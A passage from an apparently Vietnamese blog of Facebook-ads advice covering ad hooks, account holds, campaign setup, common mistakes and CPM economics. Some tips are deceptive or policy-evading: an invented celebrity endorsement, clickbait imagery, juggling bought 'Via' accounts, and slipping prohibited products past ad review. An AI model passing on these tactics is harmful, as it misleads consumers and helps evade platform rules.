
  ” Đông Nhi và Ông Cao thắng đã lựa chọn sản phẩm này trong đám cưới… ”

  5/ Hình ảnh số 1 chẳng liên quan gì đến sản phẩm

  có thể là một ảnh phim bom tấn, ảnh chế hài, ảnh gợi cảm, ảnh phim nhật 2 diễn viên ? ( phù hợp các sản phẩm giá rẻ, dễ mua, sản phẩm combo )

  6/ Ảnh số 1 là một bãi chiến trường

  đầy hàng hoá bầy càng la liệt càng tốt, hoặc video đóng hàng cho khách càng nhốn nháo, tán loạn càng tốt. ( Phù hợp sản phẩm sản xuất, sản phẩm siêu rẻ, sản phẩm bán 1 lần )

  7/ Chạy Video 3p-5p ẩm thực, khám phá thế giới, hoạt hình…v..v

  mà cứ 15s lại bật quảng cáo sản phẩm 1 phát =))) ( phù hợp sản phẩm nhu yếu phẩm, thực phẩm, hàng rẻ, hàng lãi siêu cao… )

  8/ Tạo ra nội dung có ích thực sự cho khách hàng,

  ở cuối bẻ lái sang sản phẩm của shop mong muốn. Ví dụ: Siêu lớp học Facebook Ads TỐT NHẤT nên học ? www.chapallthay.com ? ( phù hợp với mấy thầy dạy quảng cáo hay dạy làm giàu cấp tốc )

 • 8 Nguyên nhân TKQC bị tạm giữ (hold) tiền và tụt limit, tụt ngưỡng thanh toán.

  1/ Dùng chung thẻ lảm thanh toán cho nhiều tài khoản quảng cáo.

  2/ Ngân sách chiến dịch hàng ngày quá lớn so với ngưỡng thanh toán.

  3/ Liên đới môi trường sử dụng vì sử dụng nhiều Via trên cùng 1 thiết bị.

  4/ Liên đới profile đang cùng admin của tkqc hoặc fanpage có lịch sử đang nợ tiền.

  5/ Profile mới tạo trên ip Việt Nam, tkqc mới add thẻ trên ip việt.

  6/ Quảng cáo bị từ chối, các bất thường liên quan sản phẩm vpvs chưa lách được triệt để.

  7/ Tkqc thanh toán fail do không đủ tiền trong thẻ

  8/ Share quá nhiều via cầm tkqc

 • 3 bước chạy quảng cáo tin nhắn MAX HIỆU QUẢ cho tìm kiếm & video trong luồng

  Chào các bạn, mới gần đây Facebook đã có hai update mới khá là hay ho là cho phép nhà quảng cáo chạy quảng cáo trên mục tìm kiếm của Facebook và một thứ… bí mật sẽ được chưởng môn bật mí ngay sau dưới đây ka ka…

  Như chúng ta đã biết thì khi chạy chiến dịch quảng cáo tin nhắn chúng ta sẽ bị ẩn mất nguồn phân phối tím kiếm hay video trong luồng. Vậy nhưng rất ít người biết đây lại là 2 nguồn phân phối giá ít cạnh tranh vì ko mấy người thích :)) Trước đây thì có thể nó chưa có hiệu lực và không hiệu quả lắm vì trong nguồn phân phối này mẫu quảng cáo được hiển thị búa xua trong nhiều thể dạng video ba lăng nhăng.

  Vài tháng trở lại đây, Facebook đã update thêm ” Bộ lọc danh mục ” và ” danh sách chặn ” đây dù mới là sự cố gắng bước đầu còn khá rối. Nhưng cũng giúp cho nhà quảng cáo đỡ đi được phần lớn các nguồn phân phối tà phế lù ít ra chuyển đổi mà chỉ chăm chăm kiếm xéng dạng live game chẳng hạn…

  Để chạy được chiến dịch tin nhắn cho nguồn phân phối tìm kiếm và video trong luồng một cách hiệu quả nhất, chúng ta sẽ cần tạo cấu trúc chiến dịch lựa chọn như sau.

  Bước 1: Tạo chiến dịch tin nhắn theo hình bên dưới.

  Bước 2: Tạo chiến dịch lưu lượng truy cập => chọn bài viết có sẵn

  ( là bài viết tạo từ chiến dịch tin nhắn ) cấu hình như bên dưới

  Bước 3: Chúng ta có cấu trúc chiến dịch chạy song song như sau:

  Chú ý quan trọng: Nên chạy bài 1 video ( thời gian dưới 15s ) hoặc 1 ảnh với kích thước vuông 1:1 hoặc 16:9

 • 8 LỖI bất tử khi làm quảng cáo bán hàng online by Chapallthay

  1/ Về nội dung và thông điệp

  luôn muốn tìm hiểu nhu cầu + sở thích khách hàng thông qua những câu hỏi – tự trả lời.

  Người làm quảng cáo online thường có xu hướng lười biếng trong việc kiên nhẫn dùng vài phương pháp + ngân sách để check & test nhu cầu của khách hàng hoặc độ lớn thị trường. Thay vào đó họ dùng những bộ câu hỏi giả thiết hòng thoả mãn tâm trí một cách nhanh chóng và đây là con đường tắt dẫn đến những trận thua liên tiếp trong trò chơi.

  Chưởng môn sẽ ví dụ một chút để giúp các bạn hiểu rõ hơn nhé: Bạn A mới nhập một lô hàng giầy thể thao, bạn A tự hỏi “Khách hàng sẽ thích gì nhất ở một đôi giày thể thao?” – thường 2 thứ sẽ nảy ra trong tâm trí bạn A nhãn hiệu + thiết kế mới – Vậy là bạn A làm các mẫu quảng cáo dạng “HOT Chúng tôi đang có các mẫu giầy thể thao thiết kế mới nhất 2020 của Adidas” Câu trả lời là bạn A đã sai với lối chơi của hoàn toàn mờ nhạt, hoàn toàn bị pha loãng trong tâm trí của khách hàng.

  Lựa chọn đúng của bạn A cần thử nghiệm là “Ở đây chúng tôi bán giầy thể thao x30 sức bật, chống chấn thương từ Adidas” hoặc “MUA 1 đôi giầy thể thao, TẶNG 2 đôi tất chống hôi chân công nghệ cao (HÀNG Adidas MỚI NHẤT VỪA VỀ 30p)”

  Xem thêm: https://longhn.com/7-phuong-phap-giam-50-gia-quang-cao-trong-1-phut-by-chapallthay-3149.html

  https://longhn.com/7-nguyen-tac-vang-de-lam-content-ban-hang-by-chapallthay-2987.html

  2/ Về khách hàng

  8 lỗi bất tử khi làm quảng cáo bán hàng online

  Luôn cảm thấy ai cũng có khả năng trở thành khách hàng tiềm năng của mình, hay nói cách khác là ai cũng có thể mua hàng của mình. Đây cũng là một sai lầm thường xuyên gặp phải của phần lớn các bạn làm quảng cáo online. Điều này sẽ làm làm các bạn lãng phí ngân sách quảng cáo do chọn tệp khách hàng quá rộng so với ngân sách. Ngoài ra cũng tạo ra những sản phẩm, thông điệp quảng cáo mờ nhạt dành cho tất cả mọi người.

  Lựa chọn đúng ở đây là bóc tách từng line khách hàng cụ thể trong mỗi chiến dịch để chọn thông điệp cho phù hợp.

  Xem thêm: https://longhn.com/gai-cao-cap-va-nha-quang-cao-849.html

  https://longhn.com/tu-duy-chon-tuong-tac-messenger-hay-chuyen-doi-web-by-chapallthay-1727.html

  3/ Về lợi nhuận

  Muốn có được tỷ suất siêu lợi nhuận ngay trong các chiến dịch đầu tiên giống như kỳ vọng hoặc… giống đối thủ. Chiến thắng thì ai cũng thích mà tâm lý nóng nảy, vội vàng chỉnh sửa mọi thứ trong chiến dịch sẽ tạo ra kết quả cái gì cũng thấy bất ổn. Bạn sẽ rơi vào một vòng xoáy chỉnh sửa chiến dịch điên cuồng, stress kéo dài, tâm lý không ổn định.

  Càng chỉnh sửa chiến dịch chỉ làm bạn thấy điên cuồng cay cú hơn mà thôi, mà dù bạn có chiến thắng nhanh như bạn kì vọng thì với cách làm này ban cũng sẽ không hiểu tại sao mình chiến thắng. Lượt tiếp theo của bạn sẽ ra sao trong trò chơi?

  Lựa chọn đúng là cần có công thức dự đoán hoặc tính toán được trong khả năng của vốn ngay từ khâu chuẩn bị chiến dịch.

  Xem thêm: https://longhn.com/ban-hang-online-chi-phi-quang-cao-bao-nhieu-la-du-1741.html

  https://longhn.com/tu-duy-camp-test-cac-phuong-phap-dung-cho-cac-nganh-2875.html

  4/ Về chiến thuật

  Chưa biết cách tạo ra những ” Đòn quyết định ” để giành được sự ghi nhớ đầu tiên của khách hàng trong từng thời điểm.

  Chưởng môn thấy hầu hết các nhà quảng cáo đều chạy theo cảm xúc. Thiếu sự tập trung và nhất quán trong cách thức triển khai chiến dịch lâu dài làm mờ đi ấn tượng của khách hàng đối với brand hay sản phẩm. Việc này là do các bạn chưa biết hi sinh, chưa hiểu nguyên tắc: ít hơn nhiều hơn, nhiều hơn ít hơn. Bạn sẽ cần hi sinh phần lớn khách hàng mới hoặc tiềm năng để có thêm được chút ít khách hàng mua hàng, bởi vì hiệu quả thực tế của chiến dịch được quyết định bởi KHÁCH MUA HÀNG.

  Lựa chọn đúng: bóc tách từng lớp chiến dịch, khách hàng mới, khách hàng tiềm năng, khách hàng cũ. Đồng thời chạy song song nhiều dạng chiến dịch trong cùng thời gian để tăng hiệu quả tổng thể.

  Xem thêm: https://longhn.com/ky-thuat-3-buoc-mix-target-content-quang-cao-facebook-de-20d-10k-1-binh-luan-1110.html

  5/ Về cạnh tranh và nguồn lực

  Nghĩ rằng mình bỏ ra càng nhiều tiền đồng thời ăn lãi ít thôi thì sẽ… đè bẹp đối thủ. Khi đối thủ đã từ bỏ lúc ấy mình sẽ chiếm thị trường và kiếm bộn tiền.

  Đây là tư duy của rất nhiều các bạn bán hàng online ở việt nam, lối tư duy này sẽ khiến bạn hụt hơi về nguồn lực khi muốn đấu với… cả thị trường, mà thị trường thì hết lứa này nằm xuống lại có lứa mới mọc lên.

  Bạn có bao nhiêu nguồn lực để cứ mãi cạnh tranh về giá? Đồng thời việc thiếu ngân sách quảng cáo trên mỗi đơn hàng cũng khiến bạn khó mở rộng động phủ thị trường khi cần thiết. Lãng phí vận hành, chi phí cơ hội.

  Lựa chọn đúng: khi nguồn lựa còn hạn chế thì cần tập trung từng nhóm nhỏ khách hàng,

  Xem thêm: https://longhn.com/tu-duy-lam-quang-cao-la-di-cau-co-dung-khong-3175.html

  https://longhn.com/canh-tranh-tren-facebook-ads-thuc-su-la-gi-tai-sao-phai-nhanh-khi-lam-quang-cao-2836.html

  6/ Về thị trường và sản phẩm

  Hiểu chưa đúng cuộc chiến bên trong ngành hàng mình đã lựa chọn. Mỗi cuộc chiến đều có thứ quan trọng cần phải tranh giành, có ngành hàng là cuộc chiến về sản phẩm, có ngành là nhận thức thương hiệu, có ngành là… vận hành.

  Việc nghiên cứu kỹ thị trường hay ngành hàng khi các bạn mới bước chân vào kinh doanh có thể không cần sâu nhưng rất cần thiết. Nếu bạn hiểu chưa đúng trong cuộc chiến thì bạn sẽ thua mà chẳng biết mình thua ở đâu đổ tại đủ thứ từ giá thành, chất lượng sản phẩm đến thị trường. Tiếp theo bạn sẽ Lãng phí nguồn lực ở mức cao chỉ để đánh đổi lại giá trị thấp cho việc kinh doanh của mình.

  Lựa chọn đúng: thu gọn lại tất cả ham muốn bằng việc xác định rõ MỤC ĐÍCH CỦA CHIẾN DỊCH LÀ GÌ? Là brand hay bán hàng, thường thì chỉ được chọn 1 trong 2.

  Xem thêm: https://longhn.com/danh-cho-ca-map-cong-thuc-tinh-do-lon-thi-truong-by-chap-all-thay-1402.html

  7/ Về kinh nghiệm

  Nghĩ rằng cứ tiêu thật nhiều tiền đi, hoặc đi nghe mấy chuyên gia chia sẻ chém gió thật lực là sẽ auto khôn lên, sẽ thành dân chuyên nghiệp phút mốt, phút hai.

  Trong ngành quảng cáo hay marketing truyền thống thì bạn càng tiêu nhiều tiền level bạn càng lên cao. Vậy nhưng online lại là một phạm trù khác, chưởng môn luôn nói kiến thức không quan trọng bằng phương pháp học, cách học. Nếu phương pháp của bạn sai mà nhỡ thành công nhỏ thì trong tương lai càng tiêu nhiều tiền, vỡ nợ càng to. Ngành quảng cáo online này vất vả, căng thẳng về trí óc, không có con đường tắt càng không dành cho mấy thằng lười.

  Lựa chọn đúng: Trong ngành này cái gọi là kinh nghiệm không phải lúc nào cũng là ưu thế. Kiến thức không quan trọng bằng phương pháp học, cần liên tục thay đổi chiến thuật và cách tiếp cận khách hàng.

  Xem thêm:https://longhn.com/4-cong-thuc-chon-san-pham-ban-tren-phay-buc-von-nho-da-dang-mau-hay-it-mau-842.html

  https://longhn.com/tu-duy-dau-moi-kien-thuc-cach-de-hoc-moi-thu-ban-muon-trong-doi-nay-3089.html

  8/ Về kết quả / chi phí,

  Do quá tập trung doanh số không để ý đến chuyển đổi lãng phí ngân sách mà vẫn nghĩ mình lãi nên… hiệu quả.

  ⁃ Mất mỗi 10% chuyển đổi thì mất 3 loại chi phí: quảng cáo, lãi, vận hành.

  Lựa chọn đúng: Đôi khi bạn sẽ cần thực tế để lựa chọn giữa đạt được doanh số kỳ vọng và chạy quảng cáo tối ưu nhất với hệ thống. Hãy nhớ doanh số là ảo, chỉ có tỷ lệ chuyển đổi và lợi nhuận là thật.

  Xem thêm: https://longhn.com/canh-tranh-tren-facebook-ads-thuc-su-la-gi-tai-sao-phai-nhanh-khi-lam-quang-cao-2836.html

  https://longhn.com/tat-tat-ve-pixel-chuyen-doi-nguon-khong-boc-phet-3848.html

 • 7 Quy luật mới trong quảng cáo online

  1/ Quy luật về cạnh tranh, yếu tố cạnh tranh đã xê dịch ra ngoài của chất lượng sản phẩm, giá thành, hay dịch vụ.

  Trước đây yếu tố sản phẩm quyết định quảng cáo, hiện tại quảng cáo đôi khi quyết định những yếu tố còn lại. Hay nói cách khác ngày nay xuất hiện nhiều sản phẩm/ dịch vụ là thành công của quảng cáo nhiều hơn là giá trị vốn có của sản phẩm.

  7 quy luật mới trong quảng cáo online

  2/ Quy luật chân dung khách hàng, và hành vi vẽ chân dung khách hàng dựa trên nghiên cứu thị trường hoặc bộ các câu hỏi đã lỗi thời.

  Mọi thứ đang trôi qua quá nhanh để những nhà làm quảng cáo có thể triển khai chiến dịch từng bước theo lối tư duy truyền thống. Dễ nhận ra rằng lúc bạn ngồi tỷ mỉ vẽ chân dung khách hàng xong thì đối thủ đã kéo hết băng dính =))

  3/ Quy luật mẫu mã sản phẩm,

  cũng đã thay đổi từ nhiều mẫu để bán nhiều hàng hơn sang bán số lượng càng nhiều càng tốt một mẫu sản phẩm. Khách hàng ngày càng lười hơn, tiết kiệm thời gian hơn, họ muốn có được gợi ý sản phẩm phù hợp với mình để nhanh chóng lựa chọn mua hàng thay vì bỏ thời gian ngồi lựa sản phẩm trong list sản phẩm đa dạng như trước đây.

  4/ Quy luật tóm tắt,

  ngày càng rõ nét hơn trong nhịp sống hiện đại nhanh, vội vã. 10 năm trước đây 1 clip quảng cáo thường 3-5 phút, thậm chí 10 phút, hiện tại chỉ còn 5s-90s. Người dùng ưa thích mì ăn liền, tập trung và trọng tâm, điều này đúng ngay cả với những thông điệp hay nội dung quảng cáo.

  5/ Quy luật khách mua hàng, khách hàng càng ngày càng không trung thành.

  Việc tiếp cận thông tin dễ dàng từ nhiều nguồn phân phối tạo ra hành vi mua hàng phức tạp hơn. Trước đây khách hàng có nhu cầu => mua hàng theo cảm xúc, hiện tại họ có cảm xúc => hình thành nhu cầu. Điều này cũng đòi hỏi sự thích nghi điên cuồng và nhanh nhạy hơn của những nhà làm quảng cáo.

  6/ Quy luật ngân sách quảng cáo,

  10 năm trước bạn làm quảng cáo thì không thể đo lường được chính xác hiệu quả theo thời gian thực. Vậy nên một chiến dịch cần tiêu số % ngân sách nhất định mới có thể biết được liệu có thành công hay không. Ngày nay với các công cụ đo lường hoạt động cực kỳ chính xác, hiệu quả. Nhà quảng cảo có thể dự đoán được rủi ro & thành công của chiến dịch, dung lượng thị trường, ngân sách phủ thị trường thậm chí là doanh số tương lai với độ chính xác cao. Điều này đã thay đổi quy luật tiêu tiền quảng cáo, trước đây nhà quảng cáo tiêu tiền dè dặt hơn rất nhiều ( vì họ mù chỉ số hiệu quả ), ngày nay họ có thể x100 lần ngân sách chỉ sau 1 đêm.

  7/ Quy luật của vòng đời sản phẩm/ quảng cáo,

  bất kỳ sản phẩm nào cũng có yếu tố vòng đời, các mẫu quảng cáo cũng vậy. Trong vài năm trở lại đây khi các kênh quảng cáo online google, Facebook, sàn tmđt càng ngày phát triển mạnh mẽ. Thì vòng đời của một mẫu sản phẩm cũng theo đó ngắn lại, vòng đời của một mẫu quảng cáo cũng theo đó càng ngắn hơn. Ngày nay, những người làm quảng cáo chỉ loanh quanh những mẫu tiêu chuẩn sẽ bị đào thải. Người dùng ngoài nhu cầu mua hàng, còn nhu cầu thoả mãn cảm xúc, thấu hiểu và đồng cảm. Cảm xúc vốn rất nhanh bất chợt, ai chậm không theo được thì thua.

  chưởng môn Long Sắt

  ” Thời buổi 1 tuần đổi xe, 1 tháng mua nhà. Ai nhanh thì được !? “

 • 5 yếu tố bắt buộc để làm quảng cáo chuyên nghiệp hơn

  1/ Làm quảng cáo có quy trình.

  Gồm các quy trình nhỏ: Quy trình sản xuất nội dung, quy trình test chiến dịch, quy trình quản lý sử dụng tài sản, quy trình thời gian triển khai…

  Với các team có quy mô nhỏ khi mà một người kiêm nhiệm vài quy trình khác nhau thì yếu tố này chưa quá quan trọng nhưng vẫn cần phải có để đảm bảo chiến dịch được triển khai có yếu tố đồng bộ nhất.

  Cũng như khi cần tìm lỗi sẽ cần chỉnh sửa ở quy trình nào sao cho ít ảnh hưởng hoạt động nhất.

  2/ Các công thức cơ bản cần có:

  Tính số ngày chạy, tính ngân sách chiến dịch, tính độ rộng thị trường, tính ngân sách phủ thị trường, tính bid thầu min max, tính hệ số vận hành… Các nhà quảng cáo nắm rõ được các công thức này thường sẽ chiếm ưu thế vượt trội so với đám đông còn lại.

  Làm quảng cáo CHUYÊN NGHIỆP khác với NGHIỆP DƯ ở 1 điểm duy nhất là tính toán, dự đoán được chiến dịch ngay từ khi triển khai. Còn nghiệp dư là làm theo CẢM HỨNG, hôm nay lên cái này chưa ổn thì mai lên cái khác, thấy cái này ngon thì giữ lại xấu thì tắt đi mà chẳng biết chính xác tại sao =)))

  3/ Sự phối hợp nhịp nhàng

  Vì người làm quảng cáo không chỉ có MỘT MÌNH đằng sau họ là rất nhiều nhân sự phía sau từ tele, kho, trực page… Phối hợp với các bộ phận khác cho phù hợp với ngân sách trong từng giai đoạn của chiến dịch là việc tối quan trọng để giúp nhà quảng cáo tối ưu tỷ lệ chuyển đổi, giảm lãng phí ngân sách.

  Nhà quảng cáo cần tính toán được chỉ số vận hành trong từng nấc ngân sách để các bộ phận liên quan chuẩn bị. Khoảng thời gian nào x ngân sách, với ngân sách bao nhiêu thì kho cần chuẩn bị bao nhiêu hàng? Tele cần chuẩn bị bao nhiêu người? Trực page bao nhiêu? Khoảng thời gian nào cần tập trung?…

  4/ Tập trung đúng mục tiêu ban đầu:

  Trong quá trình thực thi chiến dịch nhà quảng cáo thường có xu hướng test camp quá nhiều, điều này làm cho kết quả ngắn hạn có thể được cải thiện nhưng mục tiêu dài hạn lúc ban đầu bị thay đổi.

  Ví dụ: Khi test camp chạy cho nhà hàng nếu nhà quảng cáo quá chú trọng giá bao nhiêu 1 bình luận hay tin nhắn mà không biết khách hàng bị thực sự thu hút bởi thông điệp nào, nguyên liệu nào tạo ra cảm xúc cho khách. Thì về lâu dài khi dừng quảng cáo nhà hàng sẽ như bị rút oxy, hay nói cách khác là khách chỉ đến 1 lần vì một yếu tố qc chưa đủ mạnh như giảm giá (suýt lỗ) hoặc tặng quà miễn phí.

  5/ Đánh giá, đúc kết:

  Luôn ghi nhớ rằng:

  ” Trong quảng cáo bất cứ ngân sách nào được tiêu mà không thể đánh giá được đều là LÃNG PHÍ “.

  Muốn làm tốt khâu đánh giá và chỉnh sửa chiến dịch được chính xác, yêu cầu nhà quảng cáo phải hiểu rõ ý nghĩa & mối tương quan của các loại chỉ số trong quảng cáo: Cpm, ctr, Quality score, giá inbox, tỷ lệ cảm xúc, CR…

 • Hành trình quảng cáo: tư duy tuyến tính và phi tuyến tính ?

  Chào các bạn, chưởng môn nghĩ rằng hàng ngày bản thân mỗi người làm quảng cáo đều được xem hàng trăm thậm chí hàng nghìn mẫu quảng cáo vậy thì điều gì đã xảy ra trong tâm trí của chúng ta? Tại sao mẫu quảng cáo của họ gây ra cảm xúc? Tại sao bản thân chúng ta dù biết nghề + tiếp thu được rất nhiều mẫu quảng cáo đặc sắc vậy mà chẳng mấy khi, chúng ta có thể tự mình tạo ra được những mẫu quảng cáo cảm xúc đến mức ấy? Tại sao họ có thể sáng tạo ra nó?

  Chưởng môn đã từng suy nghĩ thật nhiều về điều này và hầu hết thời gian trong mỗi ngày tâm trí của tôi đều dành cho những câu hỏi tương tự như vậy. Kết quả tôi lại tìm thấy câu trả lời ở trong môn mà tôi ghét nhất: TOÁN HỌC

  Trước hết để dễ hình dung, chúng ta định nghĩa

  Tuyến tính:

  là một đường thẳng, trong đó để đi từ A đến E các bạn bắt buộc phải lần lượt đi qua các điểm B C D. Hay nói cách khác là kiểu step by step, cách làm đơn thuần nhất chúng ta thường được học ở trường.

  Phi tuyến tính:

  là một không gian vô hạn gồm 2 điểm A – E, trong đó để đi từ A đến E bạn KHÔNG BẮT BUỘC đi qua bất cứ điểm nào. Nói dễ hiểu là nó có thể phá vỡ, trái ngược hoặc khác biệt hoàn toàn cách làm để đi từ A đến E so với Tuyến tính nhưng có chung kết quả.

  ỨNG DỤNG THỰC TẾ

  Có một câu chuyện ứng dụng tư duy này trong quảng cáo mà chưởng môn đã từng giảng dạy để các bạn dễ hiểu.
  Khoảng giữa năm 2018, khá nhiều bạn chạy quảng cáo sản phẩm giảm cân đi học chưởng môn vì… chạy lỗ. Có 2 nguyên do: fb cấm chạy before – after, và thị trường cũng đã bị cầy nát bởi các kol ( dáng đẹp người ngon ) kèm theo nhiều cam kết hứa hẹn trên trời khi giới thiệu sản phẩm. Lúc này khách hàng bị mất lòng tin với những mẫu quảng cáo dạng KOL, mà ai cũng có thể dễ dàng thuê với vài chục triệu.

  Nhìn ở góc độ cảm xúc khách hàng không còn hứng thú với những lời giới thiệu sáo rỗng, những đoạn video đầy chất diễn viên nữa. Chưởng môn lúc ấy tôi chỉ dạy 1 tut rất nhỏ là các bạn đã chạy ads thắng như thường: thay ảnh kol thành một chị béo hoặc thay diễn viên bằng một bạn càng béo càng tốt, cho dùng thử sp trên video đồng thời giảm mức độ nói quá về công dụng sản phẩm về mức vừa phải.

  Điều này giúp khách hàng có thể nhìn thấy chính bản thân mình trên mẫu quảng cáo ( không phải một chị kol hão huyền nào đó ). Gia tăng trải nghiệm thực tế cảm xúc sử dụng sản phẩm, tin tưởng hơn vào ” Công dụng hiệu quả từ bên trong ” mà sản phẩm đem lại cho người béo. Đặc biệt khách hàng tin tưởng rằng kết quả thực sự chứ không đẹp hão huyền như mấy KOL TRƯỚC ĐÂY mà họ thường được xem.
  Và kết quả là chuyển đổi tăng vọt, thậm chí còn tốt hơn before – after ?

  Tóm lại, việc áp dụng tư duy nào chủ yếu phụ thuộc vào yếu tố sản phẩm.

  Nếu các bạn đang bán các sản phẩm phổ thông: dễ mua dễ bán. Thì đừng cố làm những mẫu quảng cáo phức tạp, giàu chất liệu. Hãy tư duy theo tuyến tính, lên các bước sản xuất mẫu quảng cáo đơn giản nhất có thể, thậm chí loại bỏ một số cảm xúc quan trọng chỉ cần tập trung vào chương trình khuyến mãi hay lợi ích khách hàng.

  Còn với các sản phẩm có yếu tố tư vấn nhiều, sản phẩm không có giá trị lập lức mà công dụng đáp ứng theo thời gian, sản phẩm đẳng cấp… Nếu muốn làm quảng cáo hiệu quả các bạn cần rèn luyện cho mình một lối tư duy phi tuyến tính, đừng sợ trái ngược, phá vỡ hay mất cân bằng. Khai thác cảm xúc khách hàng bằng đa dạng chất liệu là điều bắt buộc để tạo nên chiến thắng.
  Chúc các bạn tiếp tục kế thừa và phát huy được những tinh hoa của những người làm quảng cáo đi trước. Để tạo nên một thị trường quảng cáo cũng như kinh doanh online sôi động và nhiều mầu sắc hơn nữa.

 • Quảng cáo đắt vì… nhiều người chạy ads =)) Xấu hay tốt?

  Chưởng môn nghe cái lý thuyết + kêu than này nhan nhản từ khi tôi bước vào nghề làm ads cho đến bây giờ. Và hài hước là đa phần người làm quảng cáo bị ĐẮT hơi tí lôi cái lý thuyết này ra để tự an ủi bản thân & cộng đồng ?

  Điểm qua về tổng quan thị trường

  Năm 2020 Việt Nam đang có 69 triệu người dùng trong Facebook + insta, chỉ tính 70% hoạt động và giả thiết mỗi user 20 slot hiển thị ads (tính trên tất cả các nguồn cấp) / 1 ngày.

  Chúng ta sẽ có 69 x 0,7 x 20 = 966,000,000 slot / ngày. Tính giả thiết nhẹ trung bình 4$ / Cpm ( mỗi 1000 lượt hiển thị ) suy ra để phủ hết 966,000 cpm / ngày, chúng ta cần tổng ngân sách 3,864,000 $ ~ 88 tỷ 872 triệu VNĐ / 1 ngày ( Tạm gọi đây là ngưỡng cản ngân sách phủ thị trường )

  Với một con số tương đối này, nhiều đồng chí sẽ nghĩ rằng oh nếu đổ 1 lượng ngân sách gấp đôi ngưỡng cản 88 tỷ này vào thị trường thì cpm sẽ tăng gấp đôi =)) quá ngây thơ đi, còn lâu mới có chuyện ấy. Tại sao à? Tại vì thuật toán tính bid thầu của Facebook ads có quá nhiều biến và tạm coi là không cố định ( ở mỗi khoảng thời gian, nguồn cấp, mục tiêu phân phối khác nhau ) nó chỉ có tính cố định là LUỸ KẾ vì phân phối dựa theo ĐẤU GIÁ.

  Hiểu đơn giản, mỗi 20% ngân sách đột biến ngoài ngưỡng cản ngân sách phủ thị trường được bổ thêm vào hệ thống quảng cáo có khi sẽ làm giá CPM của cả hệ thống tăng thêm 50% thậm chí 200-500% là bình thường. Và đây cũng là lý do tại sao dù có camp win đến mức max lãi có thể bán cả vn và giả thiết đủ khâu vận hành, khi nhà quảng cáo vit ngân sách lên 200 – 500tr ( ~0,3 – 0,8 % ngân sách phủ thị trường) / ngày cũng chỉ duy trì được vài ngày ngắn ngủi, sau đấy giá quảng cáo gần như không thở nổi buộc phải hạ ngân sách ( chấp luôn mấy thanh niên chạy voi + pay cũng ko vã lãi đc mấy ngày ). Còn nếu bạn vit ngân sách vào khoảng thời gian hệ thống chưa phủ hết cpm, và chỉ số của bạn đủ các điều kiện tốt thì dĩ nhiên giá quảng cáo của bạn sẽ tăng giá từ tốn và dễ chịu hơn.

  Ở trên là khái quát, mà khái quát thì chẳng mấy người thích. Đi sâu vào vấn đề thêm một chút thì chúng ta sẽ thấy rằng trong 69 triệu người dùng FB tại VN sẽ có một số nhóm thích bình luận, một số nhóm thích nhắn tin, một số nhóm thích mua hàng qua landing, một số nhóm rất ít click vào mẫu ads mà chỉ dừng xem… Vân vân và mây mưa. Đủ loại hành vi người dùng và mỗi loại hành vi này sẽ sinh ra các mục tiêu chiến dịch khác nhau. CÙNG MỘT TARGET nhưng khác mục tiêu chiến dịch chúng ta dễ dàng nhận ra giá CPM CHÊNH LỆCH HÀNG VÀI CHỤC LẦN là bình thường ka ka. Điều này càng củng cố thêm cho phân tích khái quát bên trên, lý do? Vì hành vi khác nhau tạo nên tỷ lệ chuyển đổi mua hàng thành công khác nhau.

  Bây giờ chưởng môn nói với các bạn rằng nếu CÀNG CÓ NHIỀU NGƯỜI LÀM QUẢNG CÁO THÌ BẠN CÀNG NÊN THAM GIA VÀ CƠ HỘI KIẾM TIỀN CỦA BẠN CÀNG LỚN. Bạn nghĩ sao?

  Chưởng môn nói vậy bởi vì có 4 lý do:

  1/ Thị trường có tăng trưởng đều về nhu cầu thì mới ngày càng có thêm nhiều người bán.

  Thế nên mới có câu có cầu ắt có cung, chả ai nói có cung ắt có cầu bao giờ cả =)) chân lú rồi á.

  2/ Với các yếu tố hệ thống chưởng môn nói bên trên,

  Sẽ chẳng có mấy tay to duy trì được ngân sách lớn quá lâu / ngành hàng. Tự bản thân hệ thống quảng cáo Facebook sẽ ” hãm chi tiêu ” của các cá mập và dành cơ hội cho các bạn ngân sách nhỏ hơn. Facebook luôn muốn trải nghiệm người dùng cuối được mới mẻ với đa dạng hàng vi càng tốt để tạo ra nhiều slot hiển thị hơn nghĩa là kiếm được nhiều tiền hơn + social bền vững hơn. ” Mấy thằng có tiền đừng tưởng có tí tiền rồi mày đòi làm loạn hệ thống của tao nhé “- MARK XOĂN =))

  3/ Sự đào thải của thị trường sẽ là một vòng tròn luân chuyển liên tục,

  khi mà nếu đột nhiên có một nhóm nhỏ nhà quảng cáo ở một số ngành hot cố gắng đẩy tiền vào hệ thống để chiếm slot hiển thị hòng tiêu được nhiều tiền nhất có thể khiến giá CPM tăng lên. Nghĩa là cùng lúc ở các ngành khác cũng nhiều nhà quảng cáo cắt giảm chi tiêu, nhưng bản chất nhu cầu của thị trường phát sinh trên người dùng hàng ngày vẫn còn nguyên ở đấy. Lúc này lại càng là cơ hội cướp tỷ lệ chuyển đổi ngon ăn với những ngân sách tầm trung + cao mà có kỹ năng và chiến thuật chính xác.

  4/ Cuối cùng, đừng bao giờ nhìn vào cpm hay giá tin nhắn, giá bình luận mà đánh giá quảng cáo đắt hay rẻ.

  2014 giá cpm chỉ có 15k nhưng tỷ lệ chuyển đổi chỉ 10-30% + tỷ lệ hoàn cao với đơn hàng rẻ bèo và lúc ấy chắc chỉ vài triệu người ( đa phần thành phố lớn) dám mua hàng trên FB. Bây giờ 2020 CPM 3$ – 12$ lại có 30 – 50tr người mua hàng trên FB với đơn hàng giá trị gấp hàng trăm hàng nghìn lần, ngoài ra tỷ lệ chuyển đổi quân bình cũng tăng cao vì kỹ thuật, công cụ, hệ thống, mục tiêu được tối ưu hơn rất nhiều cho nhà quảng cáo. Thị trường nào sẽ tạo ra nhiều triệu phú $ hơn? 2014 hay 2020? Tự bạn trả lời nhé.

  Tóm lại, chưởng môn viết bài này chỉ muốn chia sẻ cho những thế hệ đi sau bớt đi gian nan, các thầy bà chuyên nhẩy đồ biết thêm kiến thức đúng mà dạy học viên sao cho có tâm. Hãy luôn ghi nhớ chân lý cánh cung, dây càng căng thì tên bay càng xa. Thị trường càng dồn nén thì càng có nhiều cơ hội ngoạn mục xuất hiện, dây đứt có thể thay nhưng mũi tên đã bay không thể thay. Cũng giống như có bao nhiêu người bán hàng vỡ nợ đi nữa thì người mua cũng không bao giờ ngừng mua hàng. Nói cho dễ hiểu: THỊ TRƯỜNG BÁN HÀNG ONLINE Ở VN MỚI CHỈ Ở MỨC MỚI PHÁT TRIỂN BAN ĐẦU. Nên bài này để dành cho ai muốn CƯỚP HẾT PHẦN THIÊN HẠ.

